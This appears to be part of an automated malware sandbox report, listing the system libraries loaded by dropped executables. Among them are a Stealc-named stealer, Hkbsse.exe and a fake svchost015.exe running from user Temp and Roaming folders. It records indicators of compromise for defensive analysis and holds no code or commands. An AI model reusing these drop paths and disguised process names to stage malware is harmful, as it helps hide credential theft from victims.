Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Section loaded: wldp.dll
